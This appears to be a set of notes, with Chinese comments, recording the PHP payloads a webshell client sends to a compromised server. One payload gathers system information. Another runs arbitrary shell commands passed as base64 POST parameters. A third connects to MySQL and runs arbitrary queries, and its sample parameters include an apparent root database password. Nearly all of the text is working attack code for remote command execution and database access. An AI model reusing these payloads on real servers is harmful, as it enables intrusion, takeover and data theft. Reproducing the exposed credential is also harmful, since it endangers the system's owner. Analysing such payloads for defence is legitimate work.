
shell:
记录一:

@ini_set("display_errors","0"); //php.ini设置
@set_time_limit(0);;            //执行时间设置

$D=dirname($_SERVER["SCRIPT_FILENAME"]);        //获取脚本位置
if($D=="") $D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";

if(substr($D,0,1)!="/"){
    foreach(range("A","Z") as $L)
        if(is_dir("{$L}:")) $R.="{$L}:";
}

$R.="\t";

$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';  //获取用户信息
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";


print $R;       //打印信息
die();

记录二:

@ini_set("display_errors","0");
@set_time_limit(0);
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);

$d=dirname($_SERVER["SCRIPT_FILENAME"]);            //获取脚本位置

$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";    //构建windows或linux指令

$r="{$p} {$c}";

@system($r." 2>&1",$ret);               //执行指令

print($ret!=0)?"ret={$ret}":"";;

die();

z1=/bin/sh
z2=cmd

sql:
@ini_set ( "display_errors", "0" );
@set_time_limit ( 0 );;

$m = get_magic_quotes_gpc ();

$conf = $m ? stripslashes ( $_POST ["z1"] ) : $_POST ["z1"];

$ar = explode("cldogcldogcldog", $conf);

$dbn = $m ? stripslashes ( $_POST ["z2"] ) : $_POST ["z2"];


$sql = base64_decode ( $_POST ["z3"] );


$T = @mysqli_connect($ar[0],$ar[1],$ar[2]);
@mysqli_query ($T, "SET NAMES utf8" );

if($dbn==""){
    $sql = "SHOW DATABASES";
    $q = @mysqli_query ($T, $sql );
    $i = 0;
    while($rs=@mysqli_fetch_row($q)){
        echo(trim($rs[0]).chr(9))."\t\t\r\n";
    }
    @mysqli_close($T);
    die();
    }
else{
     @mysqli_select_db ($T, $dbn );
     $q = @mysqli_query ($T, $sql );
     $i = 0;
     $col =@mysqli_fetch_field_direct($q,0);
     echo $col->name."\t\t\r\n";
     while ( $rs = @mysqli_fetch_row ( $q ) ) {
        echo trim($rs[0]);
        echo "\t\t";
        echo "\r\n";
     }
     @mysqli_close ( $T );
     die ();
}

z1=localhostcldogcldogcldogrootcldogcldogcldogzyt6531877654
z2=mail
z3=c2hvdyB0YWJsZXM7